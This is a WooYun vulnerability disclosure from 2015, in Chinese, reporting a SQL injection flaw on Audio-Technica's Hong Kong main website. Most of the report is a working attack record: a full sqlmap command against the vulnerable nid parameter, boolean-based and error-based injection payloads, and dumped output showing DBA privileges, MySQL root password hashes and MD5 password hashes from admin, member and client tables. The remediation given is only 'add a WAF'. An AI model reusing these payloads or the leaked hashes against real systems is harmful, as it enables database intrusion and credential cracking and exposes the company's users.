当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157264

漏洞标题:鐵三角總公司主站存在SQL注射漏洞(DBA权限+root密码+用户密码)(香港地區)

相关厂商:鐵三角總公司

漏洞作者: 路人甲

提交时间:2015-12-01 12:40

修复时间:2016-01-17 11:32

公开时间:2016-01-17 11:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-01: 细节已通知厂商并且等待厂商处理中
2015-12-03: 厂商已经确认,细节仅向厂商公开
2015-12-13: 细节向核心白帽子及相关领域专家公开
2015-12-23: 细节向普通白帽子公开
2016-01-02: 细节向实习白帽子公开
2016-01-17: 细节向公众公开

简要描述:

 鐵三角總公司在1962 年於日本成立,公司的全球開發小組一直致力於音響器材的設計、製造、行銷及發行上。鐵三角公司由最初專注於留聲機唱頭的科技研發,而時至今日,公司已能開發出高性能的咪高峰、耳筒、無綫系統、甚至乎商用壽司飯團成形機以及其他高品質的電子產品,提供給專業人士和廣大群眾使用。
  曾獲無數獎項,鐵三角公司一直以維持産品的高質量、高耐久性及高性價比爲首要目標。因此其産品無論應用在大型音樂會、專業廣播、錄音室、公司、政府機構以至大禮堂等均有著出色的表現。多個重要的政府機關,例如美國衆院及參議院皆選用了鐵三角咪高峰爲必備的政府設施。而鐵三角的咪高峰及無線系統更被全球多個權威的音樂頒獎禮所選用,其中包括“ 格林美獎”以及“ 搖滾名人堂頒獎典禮”。
  自1988 年以來,鐵三角公司在美國總統辯論大會中皆提供了無微不至的技術支援服務。在萬人注目的體育項目廣播上,鐵三角話筒亦扮演了相當吃重的角色,當中包括世界盃足球賽、超級杯、聯邦比賽、以及1996亞特蘭大、2000悉尼、2004雅典、2008北京的運動會 和2002鹽湖城、2006都靈、2010溫哥華的冬季運動會。
  鐵三角日本公司,除了在其品牌下提供了多元化的産品外,在音像變換裝置、光學感測器和各種各樣的音像專業設備方面皆已成爲市場上主導的 OEM 供應商。 在1994年,日本鐵三角集團於香港成立鐵三角(大中華)有限公司,專門負責中國國內及香港、澳門地區的業務發展。為大中華地區提供由一般消費類的耳筒、HiFi產品,以致專業級的會議系統、採訪廣播、表演和錄音設備。而鐵三角美國公司的産品市場更已遍佈西半球各地。繼香港以外,新加坡、歐洲等地的鐵三角附屬子公司亦正式成立,並迅速發展起來。今天鐵三角公司已在其專業範疇上站上一領導地位,承諾今後爲全球客戶提供更優質的産品及服務。

详细说明:

地址:http://**.**.**.**/index.php?op=newsList&action=details&nid=1278&lang=schi

python sqlmap.py -u "http://**.**.**.**/index.php?op=newsList&action=details&nid=1278&lang=schi" -p nid --technique=BE --random-agent --batch --current-user --is-dba --users --passwords --count --search -C pass


current user:    'webmaster@%'
current user is DBA:    True
database management system users [4]:
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'webmaster'@'%'
database management system users password hashes:
[*] root [2]:
    password hash: *5E6DA4BDCE20DE7D6D47E89B565F9251104E0F81
    password hash: *C94109786661EF4C1AD1B420A2EFA87F243F42E5
[*] webmaster [1]:
    password hash: *5E6DA4BDCE20DE7D6D47E89B565F9251104E0F81


Database: test_at
Table: admin
[2 entries]
+----------------------------------+
| password                         |
+----------------------------------+
| 3784abc300cb35dc54c01de3232bcaa5 |
| 81dac8227dc41cf790891730ef7a0a27 |
+----------------------------------+
Database: test_at
Table: member
[1 entry]
+----------------------------------+
| password                         |
+----------------------------------+
| 6c0066a9186b24706e3ed6b7ecaea39c |
+----------------------------------+
Database: test_at
Table: client
[9 entries]
+----------------------------------+
| password                         |
+----------------------------------+
| 02b40721728d11af45f371901b3da353 |
| 1f3b6895cd0b7eeb91ae7af0e4b0c785 |
| 2f4f0c759888b64cf54b9493115c36e0 |
| 4565c79a80660eaa925c006b89bcd765 |
| a76e97a23122128d12189b822e280680 |
| bc75c8dcc77728733d36bb6d99cbd507 |
| cc4eefc4fa26ec50370a614368f100f6 |
| f5c5d30f1430e4d64ff89f22a3a5bd1c |
| faccf5db705a61abcba522fef194cdb8 |
+----------------------------------+
Database: new_at
Table: admin
[1 entry]
+----------------------------------+
| password                         |
+----------------------------------+
| 81dac8227dc41cf790891730ef7a0a27 |
+----------------------------------+
Database: new_at
Table: member
[1 entry]
+----------------------------------+
| password                         |
+----------------------------------+
| bad7303a4c0ee42b451bafd5e24052a7 |
+----------------------------------+
Database: new_at
Table: client
[9 entries]
+----------------------------------+
| password                         |
+----------------------------------+
| 02b40721728d11af45f371901b3da353 |
| 1f3b6895cd0b7eeb91ae7af0e4b0c785 |
| 2f4f0c759888b64cf54b9493115c36e0 |
| 4565c79a80660eaa925c006b89bcd765 |
| a76e97a23122128d12189b822e280680 |
| bc75c8dcc77728733d36bb6d99cbd507 |
| cc4eefc4fa26ec50370a614368f100f6 |
| f5c5d30f1430e4d64ff89f22a3a5bd1c |
| faccf5db705a61abcba522fef194cdb8 |
+----------------------------------+
Database: mysql
Table: user
[4 entries]
+-------------------------------------------+
| Password                                  |
+-------------------------------------------+
| *5E6DA4BDCE20DE7D6D47E89B565F9251104E0F81 |
| *5E6DA4BDCE20DE7D6D47E89B565F9251104E0F81 |
| *5E6DA4BDCE20DE7D6D47E89B565F9251104E0F81 |
| *C94109786661EF4C1AD1B420A2EFA87F243F42E5 |
+-------------------------------------------+


漏洞证明:

---
Parameter: nid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: op=newsList&action=details&nid=1278 AND 3798=3798&lang=schi
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: op=newsList&action=details&nid=1278 AND (SELECT 6547 FROM(SELECT COUNT(*),CONCAT(0x716b627071,(SELECT (ELT(6547=6547,1))),0x717a767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&lang=schi
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
current user:    'webmaster@%'
current user is DBA:    True
database management system users [4]:
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'webmaster'@'%'
database management system users password hashes:
[*] root [2]:
    password hash: *5E6DA4BDCE20DE7D6D47E89B565F9251104E0F81
    password hash: *C94109786661EF4C1AD1B420A2EFA87F243F42E5
[*] webmaster [1]:
    password hash: *5E6DA4BDCE20DE7D6D47E89B565F9251104E0F81
Database: test
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| wangzi                                | 1       |
+---------------------------------------+---------+
Database: test_at
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| product_spec                          | 9039    |
| secinfo                               | 2295    |
| product_spec_parts                    | 818     |
| product                               | 795     |
| product_desc                          | 795     |
| product_file                          | 291     |
| product_spec_title                    | 167     |
| news                                  | 163     |
| product_type                          | 111     |
| dealer                                | 68      |
| authen_shop                           | 57      |
| sub_category                          | 35      |
| province                              | 34      |
| client                                | 9       |
| client_info                           | 9       |
| category                              | 3       |
| facebook_aa                           | 3       |
| admin                                 | 2       |
| email_promotion                       | 1       |
| member                                | 1       |
| member_info                           | 1       |
| visitor                               | 1       |
+---------------------------------------+---------+
Database: new_at
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| product_spec                          | 9644    |
| secinfo                               | 2543    |
| product_spec_parts                    | 876     |
| product                               | 845     |
| product_desc                          | 845     |
| product_file                          | 308     |
| news                                  | 172     |
| product_spec_title                    | 169     |
| product_type                          | 112     |
| dealer                                | 69      |
| authen_shop                           | 57      |
| sub_category                          | 35      |
| province                              | 34      |
| client                                | 9       |
| client_info                           | 9       |
| category                              | 3       |
| facebook_aa                           | 3       |
| admin                                 | 1       |
| email_promotion                       | 1       |
| member                                | 1       |
| member_info                           | 1       |
| visitor                               | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 992     |
| GLOBAL_STATUS                         | 291     |
| SESSION_STATUS                        | 291     |
| GLOBAL_VARIABLES                      | 277     |
| SESSION_VARIABLES                     | 277     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 130     |
| COLLATIONS                            | 129     |
| USER_PRIVILEGES                       | 108     |
| STATISTICS                            | 100     |
| PARTITIONS                            | 99      |
| TABLES                                | 99      |
| KEY_COLUMN_USAGE                      | 95      |
| TABLE_CONSTRAINTS                     | 74      |
| CHARACTER_SETS                        | 36      |
| PLUGINS                               | 7       |
| ENGINES                               | 5       |
| SCHEMATA                              | 5       |
| PROCESSLIST                           | 2       |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| help_relation                         | 993     |
| help_topic                            | 506     |
| help_keyword                          | 452     |
| help_category                         | 38      |
| `user`                                | 4       |
| db                                    | 1       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: test_at
Table: admin
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: test_at
Table: member
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: test_at
Table: client
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: new_at
Table: admin
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: new_at
Table: member
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: new_at
Table: client
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: mysql
Table: user
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| Password | char(41) |
+----------+----------+
Database: mysql
Table: servers
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| Password | char(64) |
+----------+----------+
Database: test_at
Table: admin
[2 entries]
+----------------------------------+
| password                         |
+----------------------------------+
| 3784abc300cb35dc54c01de3232bcaa5 |
| 81dac8227dc41cf790891730ef7a0a27 |
+----------------------------------+
Database: test_at
Table: member
[1 entry]
+----------------------------------+
| password                         |
+----------------------------------+
| 6c0066a9186b24706e3ed6b7ecaea39c |
+----------------------------------+
Database: test_at
Table: client
[9 entries]
+----------------------------------+
| password                         |
+----------------------------------+
| 02b40721728d11af45f371901b3da353 |
| 1f3b6895cd0b7eeb91ae7af0e4b0c785 |
| 2f4f0c759888b64cf54b9493115c36e0 |
| 4565c79a80660eaa925c006b89bcd765 |
| a76e97a23122128d12189b822e280680 |
| bc75c8dcc77728733d36bb6d99cbd507 |
| cc4eefc4fa26ec50370a614368f100f6 |
| f5c5d30f1430e4d64ff89f22a3a5bd1c |
| faccf5db705a61abcba522fef194cdb8 |
+----------------------------------+
Database: new_at
Table: admin
[1 entry]
+----------------------------------+
| password                         |
+----------------------------------+
| 81dac8227dc41cf790891730ef7a0a27 |
+----------------------------------+
Database: new_at
Table: member
[1 entry]
+----------------------------------+
| password                         |
+----------------------------------+
| bad7303a4c0ee42b451bafd5e24052a7 |
+----------------------------------+
Database: new_at
Table: client
[9 entries]
+----------------------------------+
| password                         |
+----------------------------------+
| 02b40721728d11af45f371901b3da353 |
| 1f3b6895cd0b7eeb91ae7af0e4b0c785 |
| 2f4f0c759888b64cf54b9493115c36e0 |
| 4565c79a80660eaa925c006b89bcd765 |
| a76e97a23122128d12189b822e280680 |
| bc75c8dcc77728733d36bb6d99cbd507 |
| cc4eefc4fa26ec50370a614368f100f6 |
| f5c5d30f1430e4d64ff89f22a3a5bd1c |
| faccf5db705a61abcba522fef194cdb8 |
+----------------------------------+
Database: mysql
Table: user
[4 entries]
+-------------------------------------------+
| Password                                  |
+-------------------------------------------+
| *5E6DA4BDCE20DE7D6D47E89B565F9251104E0F81 |
| *5E6DA4BDCE20DE7D6D47E89B565F9251104E0F81 |
| *5E6DA4BDCE20DE7D6D47E89B565F9251104E0F81 |
| *C94109786661EF4C1AD1B420A2EFA87F243F42E5 |
+-------------------------------------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-12-03 11:30

厂商回复:

Referred to related parties.

最新状态:

暂无